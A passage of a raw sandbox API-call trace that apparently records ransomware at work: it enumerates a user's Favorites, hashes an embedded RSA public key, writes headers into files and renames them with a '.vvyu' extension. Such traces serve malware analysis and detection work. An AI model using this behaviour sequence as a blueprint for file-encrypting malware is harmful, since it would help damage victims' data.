hHeap=0x2c0000) returned 1 [0194.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0194.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0194.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0194.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0194.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0194.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0194.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0194.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae24e8 | out: hHeap=0x2c0000) returned 1 [0194.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0194.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0194.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0194.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0194.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0194.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0194.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0194.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.538] WriteFile (in: hFile=0x584, lpBuffer=0x3b48b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48b8*, lpNumberOfBytesWritten=0x2f9fb14*=0x80, lpOverlapped=0x0) returned 1 [0194.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0194.539] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.539] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0194.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0194.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0194.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.540] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.540] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.540] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.541] CloseHandle (hObject=0x584) returned 1 [0194.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0194.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0194.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0194.542] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn.url.vvyu")) returned 1 [0194.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.544] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0194.548] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0194.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0194.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.548] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSNBC News.url") returned=".url" [0194.548] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0194.549] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=133) returned 1 [0194.549] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0194.553] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.553] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.555] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.555] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x85, lpOverlapped=0x0) returned 1 [0194.555] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0194.555] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.555] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.555] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0194.556] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0194.556] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.556] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0194.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0194.556] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0194.556] GetLastError () returned 0x0 [0194.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.557] GetLastError () returned 0x0 [0194.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.557] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0194.557] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0194.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.558] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0194.558] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0194.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.558] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0194.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0194.558] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0194.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0194.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0194.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae24e8 [0194.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6308 [0194.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae24a0 [0194.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6320 [0194.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6350 [0194.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63b0 [0194.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6368 [0194.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0194.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0194.559] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0194.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0194.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0194.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0194.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0194.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63b0 [0194.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0194.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6368 [0194.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0194.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6350 [0194.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0194.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0194.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0194.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0194.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0194.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0194.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0194.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0194.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0194.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0194.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0194.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0194.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0194.564] GetCurrentThreadId () returned 0x5d8 [0194.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0194.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7d58 [0194.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0194.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0194.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0194.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0194.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0194.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.566] GetCurrentThreadId () returned 0x5d8 [0194.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0194.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0194.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0194.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0194.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0194.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0194.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0194.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63b0 [0194.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0194.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0194.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0194.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0194.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0194.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0194.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0194.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6350 [0194.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0194.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0194.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0194.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0194.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0194.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6368 [0194.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0194.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0194.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0194.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6338 [0194.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0194.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63c8 [0194.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0194.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6398 [0194.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6380 [0194.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63e0 [0194.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6380 [0194.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0194.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0194.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0194.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0194.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0194.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6350 [0194.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.571] RtlAllocateHeap (HeapHandle=0x2c0000, 